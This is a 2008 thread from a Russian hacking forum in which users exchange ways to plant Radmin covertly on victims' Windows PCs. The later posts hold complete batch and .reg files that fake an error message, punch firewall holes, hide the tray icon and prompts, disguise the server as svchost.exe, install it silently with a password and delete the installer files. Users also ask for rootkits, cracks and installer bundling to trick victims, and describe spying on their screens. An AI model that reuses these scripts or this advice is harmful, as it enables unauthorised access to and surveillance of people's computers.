Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.07.2008, 11:32
|
|
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302
Репутация:
3
|
|
regedit.exe это в компе жертвы запускать надо или на своем?
а как запускать чениб на компе жертвы?чета слышал про телнет,мож пояснит кто как его настроить и т.д. и т.п.
сор за бестактный вопрос :список ключей в реестре сохранить в reg? а как?где он?наверняка я оч назойлив но один раз рассказав что где жать и больше не пришлось бы!
|
|
|
28.07.2008, 20:27
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Теперь и у меня вопрос... стоит ли переплетать свой пак радмина 2.1
на более новый типа 3.2 ... меньше ли будет "палева"... (дружелюбны ли антивиры к этой версии?)
да и накладок с конфигурацией не будет ли?....
по сути же то же самое ... пара dll , 1-а exe шка...
+ прописать настройки в реестр.. ?
|
|
|
|
28.07.2008, 21:04
|
|
Участник форума
Регистрация: 08.04.2008
Сообщений: 150
Провел на форуме:
3980762
Репутация:
136
|
|
в 3 версии видеодрайвер работает как-то по другому. Пробовал собрать под новую версию, получилась только передача файлов
|
|
|
|
28.07.2008, 23:25
|
|
Постоянный
Регистрация: 07.04.2008
Сообщений: 305
Провел на форуме:
1218795
Репутация:
176
|
|
Есть у кого нибуть крек или рабочий серийник для радмина 3.2?
|
|
|
|
30.07.2008, 16:25
|
|
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302
Репутация:
3
|
|
что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!?
как заставить жертву запустить server без соц.инженирии?
|
|
|
|
30.07.2008, 17:26
|
|
Участник форума
Регистрация: 08.04.2008
Сообщений: 150
Провел на форуме:
3980762
Репутация:
136
|
|
Сообщение от immortal16
что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!?
как заставить жертву запустить server без соц.инженирии?
причем тут telnet к радмину? если ты хочешь чтоб в процессах не было r_server просто переименуй его например в svchost
|
|
|
|
31.07.2008, 20:50
|
|
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302
Репутация:
3
|
|
да я его даже настроить не могу ! скачал готовый пак тут же на форуме !он сам распаковывается в систем!проста в viewerе есть такая функция телнет я думал мож ей надо как то воспользоваться ?мож кто расскажет как такой архивчик создать и пасс свой поставить!пишите в личку плз!
мож есть какие ниб другие способы проникнуть на комп (XP) кроме как троем?поделитесь!ну или хотя б че ниб предложите по сетевому хаку !
|
|
|
|
08.08.2008, 15:38
|
|
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302
Репутация:
3
|
|
я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:
@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
а вот что в файле 111.reg?
а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!
Последний раз редактировалось immortal16; 08.08.2008 в 17:32..
|
|
|
|
14.08.2008, 14:31
|
|
Познающий
Регистрация: 23.06.2008
Сообщений: 53
Провел на форуме:
114200
Репутация:
6
|
|
у меня была трабла:
у человека на порту 4899 стоял r_server
я закинул ему еще два переименованых радмин сервера переименованых в svchost работающих на 4898 и 4897 портах
настроил эти два через командную строку путем следующих команд:
%SYSTEMROOT%/help\svchost.exe /install /silence
%SYSTEMROOT%/help\svchost.exe /port:4898 /pass:tratata /save /silence
%SYSTEMROOT%/help\svchost.exe /start
и
%SYSTEMROOT%/config\svchost.exe /install /silence
%SYSTEMROOT%/config\svchost.exe /port:4897 /pass:tratata /save /silence
%SYSTEMROOT%/config\svchost.exe /start
в каждую директорию закидывал три файла:
svchost.exe
AdmDll.dll
raddrv.dll
собственно сама проблема с серверами на портах 4898 и 4897:
через обмен файлов и телнет конектилось отлично но "управление" и "просмотр" не работали.
после ввода пароля появлялась заставочка как при загрузке экрана и потом просто исчезала
версия сервера 2.2 версия клиента 3.2
при этом на 4899 портустоит такая точно 2.2 версия и она нормально работает
как думаете в чем может быть проблема?
з.ы. а сегодня сервера работать перестали ( видимо ктото спалил их нодом (
Сообщение от immortal16
я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:
@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
а вот что в файле 111.reg?
а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!
содержание файла 111.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5, 89,e4,b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28
факю по файлам бат и рег в первых двух постах этой темы
чтобы файлы удалялись прописываешь в бат файле в конце:
где xxx.xx название файла который надо удалить
лично у меня бат файл был следующего содержания:
@echo off
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
добавление в встроеный в винду файрвол исключения
netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "Remote Administrator Server" ENABLE
открытие нужного порта (у меня без этого не всегда работало) во все том же файрволе:
netsh firewall add portopening TCP 4897 svchost
копируем имеющиеся ключи реестра в файлик 123.reg :
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
удаляем имеющиеся ключи реестра:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
копируем нужные файлы в нужную директорию:
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
добавляем в реестр то что нам надо из файлика 111.reg:
reg import 111.reg
regedit /s 111.reg
устанавливаем сервер без уведомлений пользователя:
"%SYSTEMROOT%/help\svchost.exe" /install /silence
настраиваем сервер на 5001 порт, ставим пароль 123 без уведомления пользователя:
"%SYSTEMROOT%/help\svchost.exe" /port:5001 /pass:123 /save /silence
запускаем сервер:
"%SYSTEMROOT%/help\svchost.exe" /start
удаляем все что мы использовали для установки:
del svchost.exe
del raddrv.dll
del AdmDll.dll
del 111.reg
del 123.reg
del start.bat
Последний раз редактировалось F3x111TsSL; 14.08.2008 в 16:04..
|
|
|
|
14.08.2008, 15:26
|
|
Познающий
Регистрация: 23.06.2008
Сообщений: 53
Провел на форуме:
114200
Репутация:
6
|
|
Сообщение от dmn
Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:
taskkill /im r_server.exe /f
del C:\WINDOWS\system32\r_server.exe
.
.
{эту строку я продублировал 100 раз}
.
.
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat
Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?
попробуй так:
"%SYSTEMROOT%\system32\r_server.exe" /stop
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat
4.объясните как инсталером объединить 2 программы чтоб жертва установила и софт(желаемый) и сервер ?
в файлике 111.bat пипешь строку:
xxx.xx
где xxx.xx - имя файла который надо запустить. например install.exe
Последний раз редактировалось F3x111TsSL; 14.08.2008 в 15:33..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
